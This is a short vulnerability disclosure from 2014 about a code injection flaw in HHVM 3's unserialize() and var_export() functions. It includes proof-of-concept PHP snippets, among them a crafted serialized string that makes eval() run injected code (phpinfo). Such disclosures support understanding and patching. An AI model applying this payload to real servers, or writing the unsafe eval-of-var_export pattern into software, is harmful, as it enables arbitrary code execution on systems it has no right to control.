#Code Injection Vulnerability via unserialize() Function and var_export() Function in HHVM 3
Taoguang Chen <@chtg> - 2014.10.29
HHVM's var_export() function wrongly handles an undefined class, and unserialize() function wrongly handles an invalid classname.
##HHVM's var_export() function HHVM's var_export() function had a parse error when exporting an undefined class:
<?php
$str = 'O:7:"phpinfo":0:{}';
$obj = unserialize($str);
var_dump($obj);
var_export($obj);
The outputs in PHP >= 5.1:
object(__PHP_Incomplete_Class)#1 (1) {
["__PHP_Incomplete_Class_Name"]=>
string(7) "phpinfo"
}
__PHP_Incomplete_Class::__set_state(array(
'__PHP_Incomplete_Class_Name' => 'phpinfo',
))
The outputs in HHVM 3:
object(__PHP_Incomplete_Class)#1 (1) {
["__PHP_Incomplete_Class_Name"]=>
string(7) "phpinfo"
}
phpinfo::__set_state(array(
))
##HHVM's unserialize() funciton HHVM's unserialize() funciton had a classname parse error when unserializing object:
<?php
$str = 'O:12:"phpinfo();/*":0:{}';
$obj = unserialize($str);
var_dump($obj);
The outputs in PHP >= 5.1:
Notice: unserialize(): Error at offset 13 of 24 bytes in ...
bool(false)
The outputs in HHVM 3:
object(__PHP_Incomplete_Class)#1 (1) {
["__PHP_Incomplete_Class_Name"]=>
string(12) "phpinfo();/*"
}
##Code Injection Vulnerability Exploit these bug, it is possible to inject arbitrary code. The codes below shows a dangerous way to use unserialize() function and var_export() function :)
<?php
$str = 'O:12:"phpinfo();/*":0:{}';
$obj = unserialize($str);
// var_export($obj);
eval('$str = ' . var_export($obj, true) . ';');
The outputs in HHVM 3:
// phpinfo();/*::__set_state(array(
// ))
// ok! phpinfo() function executed:)
HipHop